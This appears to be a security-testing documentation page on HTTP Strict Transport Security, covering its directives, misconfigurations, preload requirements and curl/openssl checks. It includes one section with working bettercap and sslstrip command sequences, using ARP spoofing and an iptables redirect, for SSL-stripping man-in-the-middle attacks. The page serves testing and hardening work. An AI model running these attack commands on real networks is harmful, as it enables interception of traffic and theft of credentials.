> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# HSTS

> HTTP Strict Transport Security: analysis, misconfigurations, and SSL stripping attacks when missing.

## Overview

HSTS forces browsers to use HTTPS only. Without it, attacker can intercept HTTP requests and perform SSL stripping (downgrade HTTPS → HTTP).

***

## Check HSTS

```bash theme={"dark"}
curl -s -I https://TARGET | grep -i "strict-transport-security"
```

### Expected Header

```
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
```

***

## Directives

| Directive           | Description                                                                                                      |
| ------------------- | ---------------------------------------------------------------------------------------------------------------- |
| `max-age`           | Seconds browser remembers HTTPS-only. OWASP recommends 63072000 (2 years). Minimum 31536000 (1 year) for preload |
| `includeSubDomains` | Apply to all subdomains. Required for preload submission                                                         |
| `preload`           | Eligible for browser preload list. Has permanent consequences — hard to undo                                     |

***

## Misconfigurations

### Missing HSTS

No header → SSL stripping possible on first visit.

### Low max-age

```
Strict-Transport-Security: max-age=0
Strict-Transport-Security: max-age=300
```

`max-age=0` disables HSTS. Low values = short protection window.

### Missing includeSubDomains

```
Strict-Transport-Security: max-age=31536000
```

Subdomains still accessible via HTTP → MITM on subdomain.

### HSTS on HTTP Response

HSTS header on HTTP (not HTTPS) response is ignored by browsers. Must be served over HTTPS.

### Missing preload

Without preload, first visit to site is still vulnerable (TOFU — Trust On First Use).

***

## SSL Stripping Attack

When HSTS is missing or expired:

### bettercap

```
» set http.proxy.sslstrip true
» set net.sniff.verbose true
» http.proxy on
» arp.spoof on
» net.sniff on
```

### sslstrip (Legacy)

```bash theme={"dark"}
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -l 8080
```

Intercepts HTTP → HTTPS redirects. Victim stays on HTTP, attacker proxies to HTTPS.

***

## HSTS Preload

Browser ships with hardcoded list of HSTS domains. Protects even first visit.

```
https://hstspreload.org/
```

Requirements:

* Valid HTTPS on root domain
* Redirect HTTP → HTTPS
* HSTS header with `max-age >= 31536000`, `includeSubDomains`, `preload`
* All subdomains serve HTTPS

***

## Testing

### Check Preload Status

```
https://hstspreload.org/?domain=TARGET
```

### Check HTTP → HTTPS Redirect

```bash theme={"dark"}
curl -s -I http://TARGET | grep -i "location"
```

### Check Certificate

```bash theme={"dark"}
openssl s_client -connect TARGET:443 -servername TARGET </dev/null 2>/dev/null | openssl x509 -noout -dates
```

***

## Quick Reference

| Issue                | Risk                          |
| -------------------- | ----------------------------- |
| No HSTS              | SSL stripping on any visit    |
| Low max-age          | Short protection window       |
| No includeSubDomains | Subdomain MITM                |
| No preload           | First visit vulnerable (TOFU) |
| HSTS over HTTP       | Ignored by browser            |

***

## Sources

* [OWASP — HTTP Strict Transport Security Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html)
* [MDN — Strict-Transport-Security](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security)
* [HSTS Preload List Submission](https://hstspreload.org/)
